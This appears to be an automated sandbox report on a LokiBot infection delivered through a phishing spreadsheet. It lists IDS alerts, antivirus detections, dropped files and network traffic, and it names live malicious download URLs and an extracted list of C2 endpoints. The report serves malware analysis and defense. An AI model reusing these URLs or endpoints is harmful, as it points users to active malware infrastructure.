2024-11-21T01:21:20.049266+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-21T01:21:21.907579+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-21T01:21:23.743037+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-21T01:21:25.486576+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-21T01:21:27.098178+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-21T01:21:29.018877+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-21T01:21:30.894519+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-21T01:21:32.726630+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-21T01:21:34.558558+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-21T01:21:36.365955+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-21T01:21:38.140042+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-21T01:21:39.931532+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-21T01:21:41.604608+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-21T01:21:43.448688+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-21T01:21:45.241866+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-21T01:21:47.371970+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-21T01:21:49.207569+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-21T01:21:50.964191+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-21T01:21:52.846976+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-21T01:21:54.717406+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-21T01:21:56.499939+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-21T01:21:58.317709+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-21T01:22:00.072516+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-21T01:22:01.774545+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-21T01:22:03.913790+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-21T01:22:05.709669+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-21T01:22:07.446181+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-21T01:22:09.167577+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-21T01:22:10.840995+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-21T01:22:13.264617+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-21T01:22:15.051076+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49209	94.156.177.41	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T01:21:01.047198+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49167	94.156.177.41	80	TCP
2024-11-21T01:21:03.800167+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49168	94.156.177.41	80	TCP
2024-11-21T01:21:05.691982+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-21T01:21:07.518236+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-21T01:21:10.006433+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-21T01:21:11.985823+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-21T01:21:13.850407+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-21T01:21:15.628174+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-21T01:21:17.743709+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-21T01:21:20.049266+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-21T01:21:21.907579+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-21T01:21:23.743037+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-21T01:21:25.486576+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-21T01:21:27.098178+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-21T01:21:29.018877+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-21T01:21:30.894519+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-21T01:21:32.726630+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-21T01:21:34.558558+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-21T01:21:36.365955+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-21T01:21:38.140042+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-21T01:21:39.931532+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-21T01:21:41.604608+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-21T01:21:43.448688+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-21T01:21:45.241866+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-21T01:21:47.371970+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-21T01:21:49.207569+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-21T01:21:50.964191+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-21T01:21:52.846976+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-21T01:21:54.717406+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-21T01:21:56.499939+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-21T01:21:58.317709+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-21T01:22:00.072516+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-21T01:22:01.774545+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-21T01:22:03.913790+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-21T01:22:05.709669+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-21T01:22:07.446181+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-21T01:22:09.167577+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-21T01:22:10.840995+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-21T01:22:13.264617+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-21T01:22:15.051076+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.22	49209	94.156.177.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Payment Advice.xls

Avira: detected

Antivirus detection for URL or domain

Source: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta..	Avira URL Cloud: Label: malware
Source: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Avira URL Cloud: Label: malware
Source: 94.156.177.41/simple/five/fre.php	Avira URL Cloud: Label: malware
Source: http://94.156.177.41/simple/five/fre.php	Avira URL Cloud: Label: malware
Source: http://192.3.243.136/55/caspol.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Avira: detection malicious, Label: HEUR/AGEN.1306899
Source: C:\Users\user\AppData\Local\Temp\~DFAAE5253A99F2DBD6.TMP	Avira: detection malicious, Label: TR/AVI.Agent.xoswb
Source: C:\Users\user\AppData\Roaming\caspol.exe	Avira: detection malicious, Label: HEUR/AGEN.1306899
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1306899

Found malware configuration

Source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/simple/five/fre.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Roaming\caspol.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: Payment Advice.xls	ReversingLabs: Detection: 21%
Source: Payment Advice.xls	Virustotal: Detection: 25%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\caspol.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Payment Advice.xls

Joe Sandbox ML: detected

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta, type: DROPPED

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49170 version: TLS 1.2

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.pdb source: powershell.exe, 00000020.00000002.508901590.00000000027C2000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.pdbhP source: powershell.exe, 00000004.00000002.458561358.0000000002471000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.pdbhP source: powershell.exe, 00000020.00000002.508901590.00000000027C2000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.pdb source: powershell.exe, 00000004.00000002.458561358.0000000002471000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Source: C:\Users\user\AppData\Roaming\caspol.exe

Code function: 4x nop then jmp 00C00D58h

38_2_00C01113

Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk
Source: global traffic	DNS query: name: provit.uk

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 198.244.140.41:443
Source: global traffic	TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 192.3.243.136:80
Source: global traffic	TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49162
